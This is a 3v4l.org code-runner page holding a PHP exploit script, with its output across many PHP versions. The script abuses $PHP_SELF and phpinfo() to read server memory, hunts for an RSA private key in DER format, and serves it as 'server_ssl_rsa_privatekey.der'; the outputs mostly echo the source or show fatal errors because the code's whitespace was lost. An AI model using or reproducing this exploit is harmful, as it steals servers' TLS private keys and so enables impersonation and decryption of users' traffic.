3v4l.org

run code in 300+ PHP versions simultaneously
<?phpset_time_limit(0);$starthi = 0xb788;if (isset($_GET['start'])) { $starthi = $_GET['start'] + 0;}$i = 0; $z = 0; $olddata = ""; $keydata = "";$PHP_SELF = ($starthi << 16) | $i;while (true) { $data = ""; while (strlen($data) < 4096) { ob_start(); @phpinfo(INFO_VARIABLES); $var = ob_get_contents(); ob_get_clean(); $r = preg_match("|PHP_SELF.</td><td class=\"v\">(.*).</td></tr>|mUs",$var,$match); $var = $match[1]; if ($var == "<i>no value</i>") $var = chr(0); else $var .= chr(0); $var = html_entity_decode($var,ENT_QUOTES,"ISO-8859-1"); $data .= $var; $i += strlen($var); if ($i > 0xffff) $z++; $i = $i & 0xffff; $PHP_SELF = ($starthi + $z)<<16 | $i; } $check = $olddata . $data; $olddata = $data; $data = $check; $position = strpos($data, "\x30\x82"); if ($position !== false && $position < strlen($data)-1024) { if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") { $length = ord($data[$position+2])*256+ord($data[$position+3])+4; $keydata = substr($data, $position, $length); if (strpos($keydata, "\x01\x00\x01") > 0) break; } }}if (strlen($keydata) == 0) { header("Content-type: text/plain"); die ("Unexpected error!!!");}header("Content-type: application/octet-stream");header("Content-Disposition: attachment; filename=\"server_ssl_rsa_privatekey.der\"");echo $keydata;
Output for 4.3.0 - 4.3.11, 4.4.0 - 4.4.9, 5.0.0 - 5.0.5, 5.1.0 - 5.1.6, 5.2.0 - 5.2.17, 5.3.0 - 5.3.29, 5.4.0 - 5.4.32, 7.2.29 - 7.2.33, 7.3.16 - 7.3.31, 7.4.0 - 7.4.32, 8.0.0 - 8.0.12, 8.0.14 - 8.0.30, 8.1.0 - 8.1.28, 8.2.0 - 8.2.18, 8.3.0 - 8.3.4, 8.3.6
<?phpset_time_limit(0);$starthi = 0xb788;if (isset($_GET['start'])) { $starthi = $_GET['start'] + 0;}$i = 0; $z = 0; $olddata = ""; $keydata = "";$PHP_SELF = ($starthi << 16) | $i;while (true) { $data = ""; while (strlen($data) < 4096) { ob_start(); @phpinfo(INFO_VARIABLES); $var = ob_get_contents(); ob_get_clean(); $r = preg_match("|PHP_SELF.</td><td class=\"v\">(.*).</td></tr>|mUs",$var,$match); $var = $match[1]; if ($var == "<i>no value</i>") $var = chr(0); else $var .= chr(0); $var = html_entity_decode($var,ENT_QUOTES,"ISO-8859-1"); $data .= $var; $i += strlen($var); if ($i > 0xffff) $z++; $i = $i & 0xffff; $PHP_SELF = ($starthi + $z)<<16 | $i; } $check = $olddata . $data; $olddata = $data; $data = $check; $position = strpos($data, "\x30\x82"); if ($position !== false && $position < strlen($data)-1024) { if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") { $length = ord($data[$position+2])*256+ord($data[$position+3])+4; $keydata = substr($data, $position, $length); if (strpos($keydata, "\x01\x00\x01") > 0) break; } }}if (strlen($keydata) == 0) { header("Content-type: text/plain"); die ("Unexpected error!!!");}header("Content-type: application/octet-stream");header("Content-Disposition: attachment; filename=\"server_ssl_rsa_privatekey.der\"");echo $keydata;
Output for 8.3.5
Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 <?phpset_time_limit(0);$starthi = 0xb788;if (isset($_GET['start'])) { $starthi = $_GET['start'] + 0;}$i = 0; $z = 0; $olddata = ""; $keydata = "";$PHP_SELF = ($starthi << 16) | $i;while (true) { $data = ""; while (strlen($data) < 4096) { ob_start(); @phpinfo(INFO_VARIABLES); $var = ob_get_contents(); ob_get_clean(); $r = preg_match("|PHP_SELF.</td><td class=\"v\">(.*).</td></tr>|mUs",$var,$match); $var = $match[1]; if ($var == "<i>no value</i>") $var = chr(0); else $var .= chr(0); $var = html_entity_decode($var,ENT_QUOTES,"ISO-8859-1"); $data .= $var; $i += strlen($var); if ($i > 0xffff) $z++; $i = $i & 0xffff; $PHP_SELF = ($starthi + $z)<<16 | $i; } $check = $olddata . $data; $olddata = $data; $data = $check; $position = strpos($data, "\x30\x82"); if ($position !== false && $position < strlen($data)-1024) { if (substr($data, $position+4, 4) == "\x02\x01\x00\x02") { $length = ord($data[$position+2])*256+ord($data[$position+3])+4; $keydata = substr($data, $position, $length); if (strpos($keydata, "\x01\x00\x01") > 0) break; } }}if (strlen($keydata) == 0) { header("Content-type: text/plain"); die ("Unexpected error!!!");}header("Content-type: application/octet-stream");header("Content-Disposition: attachment; filename=\"server_ssl_rsa_privatekey.der\"");echo $keydata;
Output for 7.0.0 - 7.0.20, 7.1.0 - 7.1.25, 7.2.0 - 7.2.13, 7.3.0 - 7.3.1, 7.3.32 - 7.3.33, 7.4.33, 8.0.13
Fatal error: Uncaught Error: Call to undefined function phpset_time_limit() in /in/O5YjK:1 Stack trace: #0 {main} thrown in /in/O5YjK on line 1
Process exited with code 255.
Output for 5.4.34 - 5.4.45, 5.5.24 - 5.5.35, 5.6.8 - 5.6.28
Fatal error: Call to undefined function phpset_time_limit() in /in/O5YjK on line 1
Process exited with code 255.

preferences:
215.55 ms | 402 KiB | 326 Q